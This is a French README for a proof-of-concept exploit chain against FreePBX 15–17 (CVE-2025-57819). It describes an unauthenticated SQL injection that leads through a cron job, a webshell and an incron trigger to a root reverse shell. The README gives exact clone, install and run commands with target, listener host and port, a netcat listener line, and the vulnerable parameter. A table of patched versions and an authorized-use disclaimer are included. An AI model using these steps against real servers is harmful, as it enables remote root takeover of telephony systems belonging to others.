
PoC full-chain CVE-2025-57819 pour FreePBX 15, 16 et 17 : SQLi non authentifiée menant à une RCE et à une prise de contrôle root.
PoC couvrant toute la chaîne d'exploitation pour CVE-2025-57819. Une injection SQL non authentifiée basée sur les erreurs dans le module endpoint de FreePBX débouche sur un shell root via l'injection d'une tâche cron et l'escalade de privilèges incron.
Réservé aux tests et aux recherches autorisés uniquement. Ne pas utiliser contre des systèmes que vous ne possédez pas.
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
/admin/ajax.phpasteriskfwconsole en tant que rootgit clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt
python3 CVE-2025-57819.py <target> <lhost> <lport> [--cleanup]
Démarrez d'abord un listener :
nc -lvnp 9999
Exécutez ensuite :
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999
--cleanup supprime le webshell et la tâche cron après l'exploitation.
FreePBX avec le module endpoint installé. Le paramètre brand dans /admin/ajax.php est transmis sans assainissement dans une requête SQL.
| FreePBX | Version corrigée |
|---|---|
| 15.x | 15.0.66 |
| 16.x | 16.0.89 |
| 17.x | 17.0.3 |
ozcanpng — github.com/ozcanpng — ozcanpng.dev